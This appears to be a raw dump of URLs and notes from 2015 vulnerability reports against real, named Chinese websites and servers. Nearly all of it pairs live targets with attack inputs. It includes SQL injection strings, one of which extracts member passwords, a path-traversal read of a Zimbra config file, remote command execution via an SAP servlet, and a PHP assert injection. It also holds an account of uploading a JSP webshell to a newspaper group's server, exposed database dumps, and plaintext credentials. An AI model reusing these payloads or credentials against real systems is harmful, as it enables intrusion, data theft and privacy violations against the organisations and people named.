http://www.hnbyoa.com/,此处验证码只是摆设,截包时发现根本没用到,用猪猪侠的常用用户名可获得一百多个有效账号,登陆后可查看河南日报报业集团所有人员联系方式(权限高的账号可以看到高层具体联系方式,里面包括张建董事长联系方式),还可进入档案管理系统、内部通讯系统等。在“个人信息”“上传照片”处,可突破限制上传jsp一句话,用菜刀连接getshell,发现前人留马痕迹,我自己上传的在最上面,已删。里面可以找到服务器配置信息,获取用户和密码。 http://kaoshi.centfor.com/WebResource.axd?d=1436061238 http://kaoshi.centfor.com/WebResource http://221.7.54.196:90 http://221.7.54.196:90/console http://qyy.baidu.com/light/index?control=manage&plugid=pl1&cptid=abc&cptname=list&pkg=lego&token=B8t3dNUZSJ6Fy3QdJxkU9qETHoG6KV10Y96VVAPQRNAzEA7Y&caction=addpost&classid=cl12324959920305858&postid=po12481608043951994 
http://services3.aastocks.com/xyzq/market_stockquote_server.aspx?symbol=03968&stockid=hk&source=AA&newsid=NOW.676866 https://ws.lightinthebox.com/zh/signin shopping.55bbs.com/market_23105.html shopping.55bbs.com/market/info_all_0_14__1.html http://mail.dlairport.com http://mail.dlairport.com/mail.zip http://damotools.apphb.com/getimg.aspx www.rongji.com及www.rongji.com.cn www.rongji591.com ip:114.112.70.142 domain:g.candou.com http://paas-developer.huawei.com/home/login.htm http://qfoa.qfkd.com.cn/setqfkd/login.aspx txtUserName:admin txtUserPwd:adad http://product.cnmo.com/ http://**.**.**.**/bugs/wooyun-2015-0122261 http://**.**.**.**/epg/template/template498/pvclient.php?movieid=278112856&_=1435414312519 http://www.gdzjb.gov.cn/News.aspx?CategoryID=7&Id=7608 http://www.gdzjb.gov.cn/News.aspx?CategoryID=7&Id=7608 http://www.gdzjb.gov.cn/News.aspx?CategoryID=7&Id=7608 http://www.gdzjb.gov.cn/Admin/AdminLogin.aspx?ReturnUrl=%2fadmin%2fDefault.aspx http://www.gdzjb.gov.cn/Admin/Download.aspx http://www.gdzjb.gov.cn/uploadfile/wooyun.asp password:wooyun http://www.sfi.org.tw http://libsvr.sfi.org.tw:80/torica97web/cc/cc_detail.asp?ccno=0000010630&mkey=6%20AND%203*2*1%3d6%20AND%20108%3d108&t1=%B4%C1%A5Z%A4%E5%B3%B9%ACd%B8%DF%B5%B2%AAG http://survey.book.sina.com.cn/list_search.php?channel_id=1&order=hot&page=2 http://96368.hntobacco.com/ecweb/notice/sysNoticeEditor.htm http://219.141.211.68/ http://219.141.211.68/WebResource.axd?d=_hLB41yG9DcuGF4Ww2NoOw2 http://219.141.211.68/ScriptResource.axd http://219.141.211.68/ScriptResource.axd?d=p6hCOseKeZTj8wE3klIzh9pWd-i7Q8-A4nlQQ71t8CAAAAAAAAAAAAAAAAAAAAAA0 http://antivirus.wanfangdata.com.cn/phpmyadmin/ http://antivirus.wanfangdata.com.cn/admin/login.php http://www.peng-xin.com.cn/dichan/manager/default.asp http://14.29.1.11:8080/platform/index.action http://travel.haier.com/travel/Hotel/SPHotelInfo/ChangePwd.aspx http://**.**.**.**//SoftWarer//include/softversion.asp?cType= 
http://**.**.**.**:8010//SoftWarer//include/softversion.asp?cType= http://www.lianhe18.com/riskinfo.aspx?type=fwpz&img=1&cardno=2018800001 http://www.lianhe18.com/riskinfo.aspx?type=fwpz&img=1&cardno=2018824900 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=4116600001 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=4116625000 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=5218805001 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=5218884258 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=5221500001 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=5221552401 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=7118802100 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=7118825000 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=8118820001 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=8118899999 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=9661500001 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=9661510001 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=9771500001 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=9771536000 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=9881500001 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=9881543000 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=9991500001 http://www.lianhe18.com/RiskInfo.aspx?Type=fwpz&img=1&CardNo=9991520001 https://mall.gree.com/mall/FindAddressCmd?catalogId=10001&id=1360256&langId=-7&storeId=10652 https://mall.gree.com/mall/FindAddressCmd?catalogId=10001&id=1360154&langId=-7&storeId=10652 https://mall.gree.com/mall/FindAddressCmd?catalogId=10001&id=1360160&langId=-7&storeId=10652 http://m.zxhsd.com http://3g.i.xywy.com/index/login http://www.shyule.org/ http://www.bio-tag.com.cn/ftb.imagegallery.aspx http://www.iliangcang.com/i/shop/list/?cat_id=00010009 
http://m.weifengke.com/uact/login?referer=http://m.weifengke.com http://www.fs121.com/zwgk.aspx?c=030101 http://peixun.centfor.com/UserAction!login.action http://vios.19lou.com/vios.19lou.com.sql http://mpl.m3guo.com/index.php?mod=schedule&team=1%27 http://www.aokang.cn/ http://www.ynzb.com.cn/Branch.aspx?Num=QY_20070925101048734 http://222.73.234.172/ http://mm.263.com http://dj.teamnet.cc:888/ http://dj.teamnet.cc:8090/ http://dj.teamnet.cc:8090/logs/access.log.20150704 http://115.29.98.188:8090/smartmmsc/blog_magazine_manage.do?action=new http://115.29.98.188:8090/smartmmsc/ http://gpms.foton.com.cn/uapws/ http://erp.suning.com.cn/uapws/ http://fm2.cscec.com/uapws/ http://bap.ufida.com/uapws/ http://61.178.99.236:9002/uapws/ http://zc.hayao.com:8080/uapws/ http://221.1.83.115:9001/uapws/ http://hr.meten.com/user/four?uid=10 http://hr.meten.com/user/findpwd ftp://123.71.192.123/ http://golf.163.com/e/action/ListInfo/index.php?page=1&classid=340&state=1&keyboard=13 http://fenxiaoportal.shopnum1.com/ShoppingCart1.aspx?MemLoginID=TEST124 http://fenxiaoportal.shopnum1.com/ShoppingCart2.aspx?MemLoginID=TEST124 http://wdcx.yundasys.com:81/yd_wd_cas/php1/ff_dtl.php?page_no=2&gsbm=617001&start=2015-03-07%2000:00:00&end=2015-03-07%2023:59:59&sfd=&psywy=9997 http://wdcx.yundasys.com:81/yd_wd_cas/php1/ff_dtl.php?page_no=2&gsbm=617001&start=2015-03-07%2000:00:00&end=2015-03-07%2023:59:59&sfd=&psywy=9997 http://**.**.** http://**.**.**/web/ http://**.**.**/system/Login.aspx http://www.jsqcys.com/Resources/download/634859132300308438.txt文件内存在系统密码等信息,并且经过测试结算平台可以使用admin用户登录。 http://eladies.sina.com.hk/cgi-bin/video/main.cgi?action=list&cat=284&page=5&total=182 http://www.qfkd.com.cn/setqfkd/login.aspx http://oa.qfkd.com.cn/setqfkd/login.aspx http://qfoa.qfkd.com.cn/setqfkd/login.aspx http://sj.pay.xoyo.com http://mail.lvmama.com/ http://email.cntv.cn/ http://fenxiao.lvmama.com/ http://61.191.56.216/ 
http://www.mangocity.com/index.php/freeline/productinfo_controller/journey_print?thirdpartid=222292p2 http://weixin.sudu.cn/ http://sqlmap.org http://kpi.focus.cn/.git/config ip:112.124.7.74 domain:websocket.btcchina.com URL:http://app.eben.cn/index/appcatf/?q=-1 URL:http://app.eben.cn/index/appcat/t3/?q=-1 URL:http://app.eben.cn//index/providerf/73/%E9%97%AA%E5%8A%A8%E7%A7%91%E6%8A%80?q=-1 URL:http://app.eben.cn/index/providerf/54/%E7%88%B1%E7%B1%B3%E5%90%A7?q=-1 http://app.eben.cn/index/appcatf/?q=-1 ip:125.39.185.150 ftp://218.201.55.189/ ip:203.195.205.41 http://api.duoqu.com/op/login?op=33&g=19&customerId=53511&data=eyJnYW1lSWQiOiI4NiIsImdhdGVXYXlJZCI6InMxMTciLCJpc0FkdWx0IjoiMSIsIm5pY2tOYW1lIjoiamQzOTIyNjJjdGQiLCJ1c2VySWQiOiIyODY3MDU0OTM5NiIsInVzZXJMZXZlbCI6IjExIn0=&identify=e8839c36-00df- ip:199.115.98.130 https://krt.swsc.com.cn/pages/login/loginCheckCode.action ip:122.226.73.177 http://wooyun.org/bugs/wooyun-2015-098434 http://crshdi.crcc.cn自动跳到http://www.sty.sh.cn/web/index.asp这个站上面 http://www.sty.sh.cn/web/kjcx_kcsj_list.asp?id=261&sslb=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&bz=%EF%BF%BD%EF%BF%BD%EF%BF%BD%E3%B9%A4%EF%BF%BD%CC%BF%EF%BF%BD%EF%BF%BD%EF%BF%BD http://tc.homelink.com.cn http://bstest.creditease.cn/toLogin http://store.eben.cn:80/book/tag/500-1'%20OR%203*2*1%3d6%20AND%20000156%3d000156%20--%20 http://store.eben.cn:80/precinct/84?q=-1 http://store.eben.cn:80/magazine/search/?q=-1 http://store.eben.cn:80/precinct/1?q=-1 http://store.eben.cn:80/precinct/85?q=-1 http://store.eben.cn:80/precinct/86?q=-1 http://store.eben.cn:80/precinct/87?q=-1 http://aqgl.crcc.cn/index.do http://hceb.crcc.cn/web.zip http://tuan.17house.com/affordable.php?gid=1831 http://tuan.17house.com/affordable.php?gid=1831 Error:You Errno:1064 http://www.vigorddns.com/aboutuser/mngdomain.php http://www.vigorddns.com/aboutuser/updomain.php http://www.vigorddns.com/aboutuser/userdata.php http://gz.feixin.10086.cn/ 
http://221.176.30.209:8080/HttpInterface/SMsg/show/sdx/MTcxMzgwMTg0/idx/aWYobm93KCk9c3lzZGF0ZSgpLHNsZWVwKDMpLDAp(注入点)/tk/ee7a99e05daf3f9b3d20aeeb85f7dca7/inx/0/fclient/pc http://oa.kuaidadi.com:5013/seeyon/index.jsp http://oa.kuaidadi.com:5013/seeyon//logs/ctp.log http://oa.kuaidadi.com:5013/seeyon/addressbook.do?accountId=&addressbookType=1&method=initList&_spage=&page=1&count=1565&pageSize=100 http://oa.kuaidadi.com:5013/seeyon/organization/peopleCard.do?method=showPeoPleCard&type=withbutton&memberId='+id ip:61.172.238.249 http://119.147.80.161:8002 http://119.147.80.161:8002/webcall_chat/leaveMessage.jsp http://119.147.80.161:8002/webcall_chat/leaveMessage.jsp http://119.147.80.161:8002/webcall_chat/leaveMessage.jsp http://101.227.240.110:8989/baf/jsp/uiframe/login.jsp http://afk.vxcn.cn/afkadmin/listUser.aspx ip:168.63.211.159 http://zone.wooyun.org/content/21272),报着实践的心态,就深入了一下。 http://www.cmreltd.com:80/ www.cmreltd.com http://mp.fanwe.net http://121.14.129.235:9000/ http://115.28.253.225/workbench/login.jsp android:configChanges="keyboardHidden|orientation android:name="org.qiyi.android.video.activitys.FrameJumpActivity android:screenOrientation="portrait android:theme="@android:style/Theme.NoDisplay android:host="tv.pps.mobile android:scheme="iqiyi-phone android:pathPattern=".*res* android:name="android.intent.category.DEFAULT android:name="android.intent.action.VIEW android:name="android.intent.category.BROWSABLE iqiyi-phone://tv.pps.mobile这个伪协议,path格式为:.*res*.,因此通过iqiyi-phone://tv.pps.mobile/res就可以将该组件调起来。 http://www.boqii.com/complaints.html http://mail.cnplhd.com.cn/#lang=cn www.bjhike.com http://www.poemston.com/ http://**.**.**.**//admini//item/itempic.aspx?itemID=20150100257 http://**.**.**.**/admini//item/itempic.aspx?itemID=20150100257 http://**.**.**.**//admini//item/itempic.aspx?itemID=20150100257 http://**.**.**.**///admini//item/itempic.aspx?itemID=20150100257 http://**.**.**.**//admini//item/itempic.aspx?itemID=20150100257 
http://**.**.**.**/admini/newsTopic/newsTopicEdit.aspx?newid=393 http://**.**.**.**//admini/newsTopic/newsTopicEdit.aspx?newid=393 http://**.**.**.**//admini/newsTopic/newsTopicEdit.aspx?newid=393 http://**.**.**.**//admini/newsTopic/newsTopicEdit.aspx?newid=393 http://**.**.**.**//admini/newsTopic/newsTopicEdit.aspx?newid=393 http://www.bocweb.cn/ http://**.**.**/zhongxin//bocadmin/j/uploadify.php http://**.**.**//bocadmin/j/uploadify.php__吉利上海车展 http://**.**.**//bocadmin/j/uploadify.php__长业控股集团___中国民营企业500强_ http://**.**.**/bocadmin/j/uploadify.php__海亮集团___中国民营企业500强_ http://**.**.**//bocadmin/j/uploadify.php___伟星控股集团 http://**.**.**//bocadmin/j/uploadify.php__浙江浙大网新置地管理有限公司 http://**.**.**//bocadmin/j/uploadify.php___步森男装官网 http://**.**.**/bocadmin/j/uploadify.php_ http://**.**.**//bocadmin/j/uploadify.php___杭州恒生科技园___上市公司_ http://**.**.**//bocadmin/j/uploadify.php___宋都股份___上市公司_ http://**.**.**//bocadmin/j/uploadify.php__道明光学股份___上市公司_ http://**.**.**/bocadmin/j/uploadify.php___歌山建设集团___集团_ http://**.**.**//bocadmin/j/uploadify.php__富通集团有限公司__集团_ http://**.**.**/xny//bocadmin/j/uploadify.php__赛丽控股集团___集团_ http://**.**.**/m//bocadmin/j/uploadify.php__博采官网___博采科技官网_ http://**.**.**/bocadmin/j/uploadify.php http://**.**.**/bocadmin/j/uploadify.php http://**.**.**//bocadmin/j/uploadify.php http://**.**.**/bocadmin/j/uploadify.php___建德市五星车业有限公司____ http://**.**.**/bocadmin/j/uploadify.php_杭州中泰深冷技术股份有限公司_ http://**.**.**/bocadmin/j/uploadify.php_范·优奇家具有限公司_ http://**.**.**/en/bocadmin/j/uploadify.php__传化公路港物流有限公司_ http://**.**.**/bocadmin/j/uploadify.php___杭州朗杰测控技术开发有限公司_ http://**.**.**/bocadmin/j/uploadify.php__浙江伟星管理咨询有限公司_ http://**.**.**/chn/bocadmin/j/uploadify.php__宁波嘉德户外用品有限公司_ http://**.**.**//bocadmin/j/uploadify.php___杭州艺之展展示设计有限公司_ http://**.**.**/sj//bocadmin/j/uploadify.php__通和置业有限公司_ http://**.**.**//bocadmin/j/uploadify.php__杭州蓝拾信息技术服务有限公司_ http://**.**.**/bocadmin/j/uploadify.php__东泷重型机械有限公司_ http://**.**.**//bocadmin/j/uploadify.php_ 
http://**.**.**/bocadmin/j/uploadify.php__万象城官网_ http://**.**.**//bocadmin/j/uploadify.php__众联文化事业机构_ http://**.**.**/en//bocadmin/j/uploadify.php__N8club_ http://**.**.**/bocadmin/j/uploadify.php___凌尚网络公司_ http://**.**.**/bocadmin/j/uploadify.php___赛宁 http://tw.codoon.com/backend/blacklist http://tw.codoon.com/backend/gorup http://tw.codoon.com/backend/friendsrc http://my.yaolan.com/cajax/AddFollow/userId/55201234/followId/55438331.html?d=1436184026450 http://120.195.108.123:8080/ucenter/ http://fed.lvmama.com/ http://fed.lvmama.com:80/ http://a.g.gomesell.com/login/login.action http://**.**.**/admin.phpc=db&m=sql_ http://**.**.**/phpmyadmin/ http://**.**.**/phpmyadmin/ http://**.**.**//member/index.php0.878158365841955&c=api&height[]=32&m=captcha&width=90 http://114.255.159.82/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 http://html5.cpd.com.cn/yunxiu0506.sql http://order.eben.cn/ http://www.fang360.com http://test.fang360.com http://test.fang360.com/index.php?app=user&ac=set&ts=face http://test.fang360.com http://124.172.250.167/ url:http://114.251.229.203:8080/mcl/ url:http://222.29.216.247/ url:http://222.29.216.247/ http://research.sfn.cn/BackStage/UserLogin/Login.aspx http://promotion.mcdonalds.com.cn/mcardadmin/editcard?id=pVI6xjpLICsKthTgmRT1WCtcTu8s http://cr23g.crcc.cn/ztlm.asp?id=647 http://cr23g.crcc.cn/jtry_dc.asp?id=495 http://cr23g.crcc.cn/qygl_dc.asp?id=8911 http://cr23g.crcc.cn/jtdt_dc.asp?id=8931 http://cr23g.crcc.cn/kjjb_dc.asp?id=8053 http://www.zdyfyyjs.com/xkjs/show.asp?bh=363 http://gd.189.cn/gz/xy/ http://cr14g.crcc.cn/NwSendInf.do?MAINID=7e6fd21fbf654897bb23251776c3abbc&MAINCOUNT=3&SUBCOUNT=0&opType=moreList&T_NW_DOCUMENT/IDBIZ=99999999 http://cr5sdi.crcc.cn/inc/qiye_wenhua.asp http://group.rbc.cn/ http://group.rbc.cn/ https://code.jquery.com/jquery-1.9.1.min.js http://www.ybyinhang.com/ inurl:konka.com/OaFiles.do?username= 
http://qdgl.konka.com/OaFiles.do?username=毛洪军&userpass=0 http://www.benlai.com/giftcard inurl:hebnetu.edu.cn/?UserName= http://www.hebnetu.edu.cn/?UserName=bywdd&Password=waxbfbyw&btnLogin=%B5%C7+%C2%BC http://oa.joyu.com/ http://www.isd.pku.edu.cn http://123.127.101.108/users/sign_in,该服务器存在未授权访问,可绕过认证,直接查看并浏览开发人员上传的源代码。 http://jiehun.55bbs.com/index.php?c=MyHunJia_RegAddr&a=GetReg&c_id=4007&p_id=1012 https://www.zj11831211.cn/login.jsp浙江电信家门口充值系统 http://218.26.187.194/)存在struts2远程命令执行漏洞泄露敏感数据。 http://kjcx.yundasys.com/kjcx/dbdb.php?op=search&&dbtxm=9000150694113 http://kjcx.yundasys.com/kjcx/dbdb.php?op=search&&dbtxm=9000171901331 http://kjcx.yundasys.com/kjcx/dbdb.php?op=search&&dbtxm=9000253165011 http://kjcx.yundasys.com/kjcx/dbdb.php?op=search&&dbtxm=9000090365632 http://kjcx.yundasys.com/kjcx/dbdb.php?op=search&&dbtxm=9000124937515 http://kjcx.yundasys.com/kjcx/dbdb.php?op=search&&dbtxm=9000176011525 http://180.153.139.84:11381/ydccp/login.jsp http://wsesj.eben.cn/index.php?r=works/view&id=82 http://www.8858.gov.cn/view/service?keys=aaa http://www.cr15g.com:8082/login.jsp http://jgcx.qingdao.gov.cn http://intx5.crcc.cn:8080/x5/portal/login.w http://120.195.108.123:8080/ucenter/index/indexAction!welcome.action?curUser=test http://120.195.108.123:8080/ucenter/index/indexAction!welcome.action?curUser=admin FTP:180.96.19.198 http://**.**.**.**/bugs/wooyun-2015-091128 http://**.**.**.**/ http://**.**.**.**/Web/CommonPage.aspx?Id=14 http://**.**.**.**/Web/CommonPage.aspx?Id=14 http://**.**.**.**/Web/CommonPage.aspx?Id=6 http://**.**.**.** http://**.**.**.**/Web/Qikan.aspx http://**.**.**.**/CommonPage.aspx?Id=6 http://**.**.**.**/web/CommonPage.aspx?Id=36 http://**.**.**.**/Web/CommonPage.aspx?Id=1 http://**.**.**.**/Web/CommonPage.aspx?Id=1 http://**.**.**.**/Web/Qikan.aspx http://oa.leyou.com/main/login.jsp http://www.beihaipark.com.cn/admin/Login.aspx http://www.beihaipark.com.cn/news.aspx?nid=f3xzXdR2 http://www.sjb-ys.com/admin 
http://www.sjb-ys.com/roaddetail.php?id=13 http://www.gotohz.com/hzlywywb.rar http://www.wanbu.com.cn/NewWanbu/App/Api/index.php/Blog/getBlog/userid/[id]/page/0/ www.wanbu.com.cn:8888 http://220.196.57.147:8080/GetUser.aspx?password=123456&service=api_company_login&username=admin http://220.196.57.147:8080/GetUnit.aspx?BeginDate=2015-06-20&City=3100&ClientLatitude=31.193943&ClientLongitude=121.346603&EndDate=2015-06-21&ImgSize=S&OrderPirce=asc&pageIndex=1&pageSize=200&PriceEnd=0&PriceState=0&Radius=15&service=api_gethotellist http://220.196.57.147:8080/GetResv.aspx?endDate=2015-06-07&guestId=8229518&isDelete=0&pageIndex=1&pageSize=20&searchType=&service=get_resvlist_info&sort=0&startDate=2014-01-01 http://220.196.57.147:8080/GetUnit.aspx?RmtpId=1&service=api_getUnitRmtp&UnitId=0001 http://dezhou.dzwww.com/dzzt/wish/data/db.inc.php http://www.hxgsbank.com/search.php?seaTitle=站内搜索...&seaform.x=0&seaform.y=0存在SQL注入漏洞 Google:inurl:search/doSearch.html http://jr.house365.com/?s=/abc/abc/abc/${@print%28@assert%28$_POST[%27a%27]%29%29}# http://tms.telehouse.net.cn/tmis/login.php http://www.qinqin.net/index.php?act=login&op=forget_password http://m.t.17186.cn/login.action http://m.t.17186.cn/exp.jsp http://www.apac.org.cn/ http://www.apac.org.cn/jbpt/ http://igr1.cnnic.cn/igr/center.do?path=jubao http://hbfy.chinacourt.org/public/detail.php?id=281 http://www.joyu.com/page1.asp?num=1= http://www.joyulf.com/index.asp http://www.joyulf.com/player/index.asp www.joyulf.com http://testblog.3g.cnfol.com:8000 http://118.195.133.196:9990/sdb2b/login.action存在命令执行漏洞 http://118.195.133.196:9990/sdb2b/1.jsp密码123 https://www.ddsoucai.com/ http://jn.hpour.com/sys/SysUser_Logon.aspx http://ydzs.shnu.edu.cn/index.php?m=Index&a=classes&type=1 http://ydzs.shnu.edu.cn/data/ http://te.shnu.edu.cn:86/Webform/BaseInfo/PublicInformation/NewsList.aspx?ID=2 http://oa.tianjimedia.com/ http://oa.tianjimedia.com/yyoa/common/js/menu/test.jsp?doType=101&S1= http://**.**.**/security/login.action 
http://106.2.168.35//qwe.jsp jdbc:sqlserver://10.0.11.3:1433;databaseName=gmxh;user=gmxherpuser;password=gmxherpDbAdmin inurl:searchOrder?email=&receiverName=&orderNumber= https://www.microsoftstore.com.cn/guest/order/1399351498 https://www.microsoftstore.com.cn/guest/order/1399293832 https://www.microsoftstore.com.cn/guest/order/1398906942 https://124.160.61.218/por/login_psw.csp?rnd=0.15976454272302432 https://221.226.184.164/por/service.csp?rnd=nokmoeicpdochimh yyxy.txon.net/exam http://yyxy.txon.net/exam_sh/login.action?userId=13900990099 https://202.136.215.38:4430/por/login_psw.csp https://202.136.215.38:4430/web/1/http/0/172.16.1.4/OA/?SVPNSSOLogin&1436253822&20262&4287041572& https://202.136.215.38:4430/web/1/http/2/172.16.1.4/OA/UploadFile/通讯录.xls https://202.136.215.38:4430/web/1/http/0/172.16.1.6/cms/ http://218.203.206.133:8000/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/hosts http://mail.scti.cn/pma/ http://www.moko.cc/zmAction%7Cforward.action?actionkey=wanmeiNew_20141213%27+and+%27f%27%3D%27f http://szxsc.shop.6v68.com http://www.now.cn/email/overview.net http://sop.secoo.com/cooperator/loginAction.action http://wx.aeonlife.com.cn/baodan/user/check.do?openId= http://wx.aeonlife.com.cn/baodan/user/check.do http://218.75.137.70:8250/WWCPS/login.action存在命令执行漏洞 http://mail.louxia100.com/ http://**.**.**.**/flight/view_xz.aspx?a=1 http://**.**.**.**/flight/view_xz.aspx?a=1 http://**.**.**.**/flight/view_xz.aspx?a=1 http://**.**.**.**/flight/view_xz.aspx?a=1 http://**.**.**.**/flight/view_xz.aspx?a=1 http://wsbs.gzmz.gov.cn/gsmpro/web/wbdt/bszn.jsp?service_id=2666 http://ti.louxia100.com/ http://weixin.lenovo.com.cn/thinkpad/login.php http://ad.hz.letv.com/phpapi/tp/tp_tab_add.php?callback=?&tpid=1 http://lm.meilishuo.com/union/sppromotion/?sort=0&type=1&content=尚雅衣橱 http://lm.meilishuo.com/union/stpromotion/?sort=0&catalog=1 
http://lm.meilishuo.com/union/pro_manage/?sort=0&catalog=11801&type=1&content=圆领长袖修身男女士居家服 http://lm.meilishuo.com/union/pro_manage/?sort=0&catalog=11801&type=1&content= http://www.now.cn/whois/info.net http://mall.cmbc.com.cn/passport/password.jhtml http://api.meituan.com/combo/v2/combo.json…… http://api.waimai.meituan.com/api/v6/app/innercheckupdate…… http://www.meituan.com/api/v2/appstatus…… http://bbs.digione.cn:7080/ http://121.14.118.250:7080/uc_server/data/tmp/x.php http://121.14.118.250:8088/weaver/weaver.email.FileDownloadLocation?download=1&fileid=2 https://101.251.207.8/fck/ https://101.251.207.11/FCKeditor/ https://101.251.207.10/FCKeditor/ https://101.251.207.10/upload/ http://zentao.coocaa.com/ http://122.193.9.45 http://122.193.9.45/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28username,0x3a,password%29%20from%20cdb_members%20limit%206,1%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://115.182.42.140/zabbix/ http://m.qu.cn/forum.php http://**.**.**.**/bugs/wooyun-2010-0103611 http://www.zfxindai.cn/event/index/id/1.html http://www.jollymm.com/members/address http://ask.youtx.com/Ajax/AjaxGetDestinationByWord.aspx?attraction=%E5%A4%A9%E5%9D%9B%E5%85%AC%E5%9B%AD ext:lp:lp_netErrorInfo:#_NETWORK_FAIL_INFO_#;Url=http://www.example.com/;IP=1;IPNum=1 http://weixin.jxlife.com.cn/jxlife/jsp/traffic_mobile_index.jsp?FromUserName= http://weixin.jxlife.com.cn/jxlife/jsp/getPhoneCode http://weixin.jxlife.com.cn/jxlife/jsp/traffic_mobile_index.jsp?FromUserName= http://baby.55bbs.com/index.php?c=Ajax&a=AjaxProInfo&pro_id=5 current_user:55babay@10.15.18% http://baby.55bbs.com/index.php?c=Ajax&a=AjaxProInfo&pro_id= http://files.leiphone.com/ http://files.leiphone.com/protected/config/main-test.php 
mysql:host=113.106.92.93;dbname=wankr100 http://www.letvcloud.com/user/checkparam http://58.247.113.202:90/manager/html http://linker.tw/url.php?uct=0-0-12-5-0*31 http://http.hz.qingting.fm/admin/ https://mail.yundasys.com/owa/# http://**.**.**.**/E-mobile/Data/downfile.php?url=/E-mobile/Data/downfile.php http://**.**.**.**/E-mobile/Data/downfile.php?url=/E-mobile/Data/downfile.php http://**.**.**.**/E-mobile/Data/downfile.php?url=/E-mobile/Data/downfile.php http://**.**.**.**:8028/E-mobile/Data/downfile.php?url=/E-mobile/Data/downfile.php http://**.**.**.**/user/login.aspx default:a进去后 http://www.dhgps.cc/ http://www.gxjldkj.com:8089/ http://www.txgps.com:8099/ http://www.yncwzn.com:7777/ http://py.gps009.net:81/ http://88056.com.cn:8087/ http://www.bds178.net/ http://61.156.14.155:8086/Gpswebtestpage.aspx http://zc.gps009.net:8086/ http://q.gps009.net/ http://cc.xjfhtgps.com/ http://gps.txsci.com:8086/ http://www.swzcn.com:6606/ http://www.88056.com.cn:8087/ http://122.193.9.222:8080/ http://**.**.**/ http://www.cctvfinance.com/plus/hangqing.php?c=showsmall2&code=szse399006 http://221.122.70.172/index.action http://221.122.70.172/exp.jsp http://www.cctvfinance.com/plus/getjson.php?c=codesearch&search_name= http://kids.chineseall.cn/index.php/index/channel/sort/-1 http://zxys.yantai.gov.cn/offer/jsp/login.jsp http://szfoa.yantai.gov.cn/地址,存在admin https://github.com/sniciq/generate/blob/55d1f3e6181135b19eb3b2285add3d4dd13cb057/src/main/resources/spring/applicationContextMail.xml http://www.ntwj.gov.cn/news.asp?Action=Details&classid=&ID=11037%27 http://www.ntwj.gov.cn/zdgf.asp?Action=Details&classid=&ID=10546%27 http://www.ntwj.gov.cn/admin/login.asp?Action=LoginCheck co-biz.variflight.com/product/ http://wap.l0086xdk.com/ http://wap.l0086xdk.com/admin/chkadmin.asp www.bornedu.com/bornmanage/index.php?s=/Zhibo/index/tag/1 http://app1.unicomlabs.com/Login.action http://app1.unicomlabs.com/Login.action 
https://mail.yundasys.com/owa/auth/logon.aspx?replaceCurrent=1&url=https%3a%2f%2fmail.yundasys.com%2fowa%2f http://www.ssfy.gov.cn/infoshow.php?id=1073 http://www.3658mall.com/member-get_password_mobile.html http://www.joyu.com/player/index.asp www.joyu.com http://www.toprand.net http://www.chouchoubaby.com/sysadmin/console/Index.aspx http://telca.com.cn/sysadmin/Login.aspx http://www.topzs.hk/sysadmin/Login.aspx http://www.shenglu.com/sysadmin/Login.aspx http://lac.jnu.edu.cn/webmanage/Login.aspx http://www.chouchoubaby.com/sysadmin/Login.aspx http://hl.cohl.com/sysadmin/Login.aspx http://www.etrlawfirm.cn/sysadmin/Login.aspx http://www.atoptechnology.com/sysadmin/Login.aspx http://sinopharm-gz.com/SysAdmin/Login.aspx http://dcyssj.com/sysadmin/Login.aspx http://paxtechnology.us/sysadmin/Login.aspx http://langrungroup.com/sysadmin/Login.aspx http://www.etrlawfirm.cn/sysadmin/Login.aspx http://100tal.com http://www.izhikang.com http://dbaoming.izhikang.com/ http://220.181.163.222:8000/admin/webroot/index.php https://itebeta.baidu.com/;说明他也许是一个内部服务吧, http://220.181.163.222:8000/admin/webroot/index.php http://tc.homelink.com.cn/ http://jwbinfosys.zju.edu.cn/lw_xsxt.aspx http://221.2.149.28:8090/qlqd/PowerList/Power_index.aspx http://221.2.149.28:8090/qlqd/PowerList/Power_index.aspx?itemtype=&itemname=aaa%27 http://**.**.**.**/admin/Product/ProductList.aspx http://**.**.**.**/admin/Product/ProductList.aspx http://www.fxiaoke.com/H/DF/Get/201507_07_b0700201-8e9a-4e3c-b383-f1ded5817f5b.html http://www.fxiaoke.com/H/df/get?id=201507_08_06080db9-f871-4497-9fc2-58646e382151.xml http://zone.wooyun.org/content/17801 http://www.qzrs.gov.cn/Login/Login http://bslog.biostime.com.cn/dealerPlatform/permission/dealerLogout.do http://track.bondex.com.cn/login.aspx?Token=$Token$ http://**.**.**.**/opensoft.asp?id=99&url=1 http://**.**.**.**/opensoft.asp?id=110&url=1 http://**.**.**.**/opensoft.asp?id=&url=1 